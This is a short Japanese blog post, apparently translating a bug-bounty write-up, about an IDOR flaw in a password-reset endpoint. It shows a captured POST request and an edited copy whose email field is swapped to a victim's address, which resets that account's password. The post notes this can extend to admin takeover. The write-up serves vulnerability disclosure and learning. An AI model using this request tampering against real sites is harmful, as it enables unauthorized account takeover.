Shikata Ga Nai

Private? There is no such things.

A Simple IDOR to Account Takeoverを訳してみた

Hello there, ('ω')ノ

 

アカウント乗っ取りへのシンプルなIDORを。

 

脆弱性:

 IDOR

 アカウントの乗っ取り

 

記事:

 https://medium.com/@swapmaurya20/a-simple-idor-to-account-takeover-88b8a1d2ec24

 

IDORは、安全でない直接オブジェクト参照を指して。

これは、許可されていないものにアクセスできるか。

そのWebアプリケーションでそのアクションを実行する権限がないことを意味して。

 

今回は、ターゲットをexample.comと呼ぶことに。

最初にログインページ、登録ページ、およびパスワードを忘れたページをテストして。

忘れたパスワードをテストしているときに。

ユーザがパスワードを新しいパスワードに変更すると。

Eメールパラメータが新しいパスワードと一緒にリクエスト本文に存在し。

新しいパスワードパラメータを確認することがわかったので。

Eメールを他の人のパスワードに変更することに。

 

元のリクエスト:

POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1

Host: subdomain.example.com

Headers: Etc

Cookie: all_required_cookies

{“email”:”attacker_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}

 

編集されたリクエスト:

POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1

Host: subdomain.example.com

Headers: Etc

Cookie: all_required_cookies

{“email”:”victim_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}

 

すると編集されたリクエストをBurpで転送した後に。

被害者のアカウントのパスワードが変更され。

ブラウザで被害者のアカウントに直接ログインできて。

 

管理者アカウントのパスワードを変更して。

管理者アカウントへのフルアクセスを取得することで。

影響を大きくすることができて。

 

Best regards, (^^ゞ